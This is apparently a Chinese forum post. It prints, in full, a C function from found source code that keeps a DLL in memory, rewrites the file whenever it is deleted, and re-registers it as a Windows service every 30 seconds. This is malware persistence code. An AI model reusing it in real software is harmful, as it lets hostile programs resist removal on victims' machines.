我在無聊之中看到一款源碼,下來看以後發現程序會創建一個ShieldThread線程
跟蹤下去發現它會把自身讀取到一個分配的內存空間,然後每個一段時間判斷自身文件是否存在
如果不存在就從內存中寫出文件。具體代碼如下
//
DWORD WINAPI ShieldThread(LPVOID lpParamter)
{
char DllFilePath[MAX_PATH];
HANDLE hDllFile;
HANDLE hSearch;
void* MemDll;
int SizeDll;
DWORD BytesRead;
WIN32_FIND_DATA FileData;
char ProtectKey1[MAX_PATH*2],ProtectKey2[MAX_PATH*2];
char * SubRoot="SYSTEM\\CurrentControlSet\\Services\\";
__try
{
ShieldFlag = 1;
strncpy(ProtectKey1,SubRoot,sizeof(ProtectKey1));
strncat(ProtectKey1,ServerCFG.ServiceName,sizeof(ProtectKey1));
strncpy(ProtectKey2,ProtectKey1,sizeof(ProtectKey2));
strncat(ProtectKey2,"\\Parameters",sizeof(ProtectKey2));
GetModuleFileName(HMODULE(hDll), DllFilePath,MAX_PATH);
hDllFile =CreateFile(DllFilePath,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);
SizeDll =GetFileSize(hDllFile,0);
MemDll =VirtualAlloc(0,SizeDll,MEM_COMMIT|MEM_RESERVE,PAGE_READWRITE);
ReadFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
CloseHandle(hDllFile);
while(1)
{
hSearch =FindFirstFile(DllFilePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
hDllFile=CreateFile(DllFilePath,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
WriteFile(hDllFile,MemDll,SizeDll,&BytesRead,0);
CloseHandle(hDllFile);
}
FindClose(hSearch);
WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey1,"Start",REG_DWORD,NULL,2,1);
WriteRegEx(HKEY_LOCAL_MACHINE,ProtectKey2,"ServiceDll",REG_EXPAND_SZ,DllFilePath,NULL,0);
Sleep(30000);
}
}
__finally
{
CloseHandle(hDllFile);
FindClose(hSearch);
}
return 0;
}